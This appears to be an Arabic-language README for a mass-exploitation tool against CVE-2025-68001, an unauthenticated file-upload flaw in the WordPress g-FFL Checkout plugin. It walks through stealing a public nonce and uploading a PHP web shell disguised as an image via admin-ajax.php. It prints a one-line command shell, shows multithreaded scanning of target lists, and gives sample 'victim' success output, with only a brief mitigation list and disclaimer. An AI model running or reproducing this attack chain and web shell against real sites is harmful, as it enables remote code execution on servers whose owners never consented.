
WordPress g-FFL Checkout Plugin <= 2.1.0 معرضة لثغرة رفع ملف تعسفي ذات أولوية عالية.
إضافة WordPress g-FFL Checkout <= 2.1.0 معرضة لثغرة رفع ملف تعسفي عالية الأولوية
_ _ _ _ _ _ _ _ _ _
/ \ / |_ __ ) / \ ) |_ __ |_ (_) / \ / \ /|
\_ \/ |_ /_ \_/ /_ _) |_) (_) \_/ \_/ |
📡 ابق في المقدمة. انضم إلى @KNxploited على تيليغرام — مصدرك الحصري لأحدث CVEs والثغرات الصفرية وأبحاث الاستغلال المتطورة. يتم تحديثه باستمرار. ليس للجميع.
CVE-2025-68001 هي ثغرة حرجة من نوع رفع ملف تعسفي بدون مصادقة تم اكتشافها في إضافة g-FFL Checkout لووردبريس بواسطة garidium.
تسمح الثغرة لمهاجم عن بعد غير مصادق برفع ملفات تعسفية — بما في ذلك شيلات الويب — إلى الخادم الهدف عبر إجراء AJAX ffl_upload_document، مما يؤدي إلى تنفيذ أوامر عن بعد كامل (RCE).
| الحقل | التفاصيل |
|---|---|
| معرف CVE | CVE-2025-68001 |
| الإضافة | g-FFL Checkout (g-ffl-checkout) |
| الإصدارات المتأثرة | n/a حتى <= 2.1.0 |
| نوع الثغرة | رفع ملفات غير مقيد |
| التأثير | تنفيذ أوامر عن بعد (RCE) |
| المصادقة | غير مطلوبة |
| شدة CVSS | حرج |
| الباحث | Nxploited |
يتبع الاستغلال سلسلة هجوم متعددة الخطوات دقيقة:
1. GET /checkout
↓
Extract `checkout_nonce` from inline JavaScript data
2. POST /wp-admin/admin-ajax.php
action=ffl_upload_document
nonce=<extracted_nonce>
document_type=document
document=<shell.php disguised as image/png>
↓
Server stores the file without extension or MIME validation
3. Parse JSON response
↓
Extract uploaded file path / unique filename
4. Access uploaded shell via HTTP
↓
Remote Code Execution achieved ✔️
تعرض الإضافة نقطة نهاية AJAX ffl_upload_document التي:
قم بتثبيت جميع التبعيات قبل التشغيل:
pip install requests rich
| التبعية | الغرض |
|---|---|
requests | معالجة طلبات HTTP والجلسات |
rich | واجهة طرفية، أشرطة تقدم، لوحات |
threading | معالجة الأهداف متعددة الخيوط |
يتطلب Python 3.8+.
CVE-2025-68001/
├── CVE-2025-68001.py # Main exploit script
├── shell.php # Web shell to upload (you provide this)
├── list.txt # Target URLs (one per line)
└── success_results.txt # Auto-generated results output
أنشئ ملف list.txt بعنوان URL واحد لكل سطر:
https://target1.com
https://target2.com
http://target3.com/wordpress
يقوم السكربت تلقائياً بإضافة
http://إذا لم يتم توفير بروتوكول.
ضع شيل الويب PHP الخاص بك في نفس المجلد. مثال لشيل بسيط:
<?php system($_GET['cmd']); ?>
احفظه باسم shell.php (أو أي اسم — سيُطلب منك إدخاله).
python CVE-2025-68001.py
سيُطلب منك تفاعلياً:
Enter targets file name (default: list.txt):
> list.txt
Enter shell file name to upload (default: shell.php):
> shell.php
Enter number of threads (default: 50):
> 20
يتم حفظ الاستغلالات الناجحة تلقائياً في success_results.txt:
https://target.com | /wp-content/uploads/ffl/abc123.php | abc123.php | shell.php
يحتوي كل سطر على:
| المطالبة | الافتراضي | الوصف |
|---|---|---|
| ملف الأهداف | list.txt | ملف يحتوي على عناوين URL الهدف |
| ملف الشيل | shell.php | شيل PHP لرفعه إلى الهدف |
| عدد الخيوط | 50 | العمال المتزامنون (الحد الأقصى: 50) |
✔ https://victim.com — /checkout reachable. Trying exploit...
┌─────────────────────────────────────────────────────┐
│ Success │
│ https://victim.com │
│ Original Name: shell.php │
│ Unique Name: a7f3c1d9e.php │
│ Stored Path: /wp-content/uploads/ffl/a7f3c1.php │
└─────────────────────────────────────────────────────┘
All targets processed ✔️. Results saved to: success_results.txt
تقع الثغرة في معالج AJAX للإضافة المسجل بدون فحوصات صلاحية:
// No authentication or capability check
add_action('wp_ajax_nopriv_ffl_upload_document', 'ffl_upload_document');
function ffl_upload_document() {
// Nonce verified from /checkout page (publicly accessible)
// No MIME type validation
// No extension whitelist/blacklist
move_uploaded_file($_FILES['document']['tmp_name'], $upload_path);
wp_send_json_success(['file_path' => $upload_path]);
}
إذا كنت مالك موقع أو مطور، قم باتخاذ الخطوات التالية فوراً:
g-ffl-checkout إلى نسخة مصححة (> 2.1.0) إن وجدت.htaccess).php مشبوهةTHIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL AND AUTHORIZED
SECURITY RESEARCH PURPOSES ONLY.
By using this script, you explicitly agree to the following:
• You have EXPLICIT written permission from the target system owner.
• You are operating in a controlled lab or authorized penetration testing engagement.
• You will NOT use this tool against any system you do not own or have legal
authorization to test.
• The author (Nxploited) holds ZERO liability for any damage, data loss,
legal consequences, or misuse resulting from this tool.
Unauthorized use of this tool against systems without permission is ILLEGAL
and may violate laws including but not limited to:
— Computer Fraud and Abuse Act (CFAA)
— EU Directive on Attacks Against Information Systems
— And equivalent laws in your jurisdiction.
USE RESPONSIBLY. HACK ETHICALLY.
| الاسم المستعار | Nxploited |
| Telegram | @KNxploited |
| GitHub | github.com/Nxploited |
🔔 تابع @KNxploited على تيليغرام لاستقبال أحدث الإفصاحات عن الثغرات، وإصدارات الاستغلالات، والأبحاث الأمنية — قبل أي شخص آخر.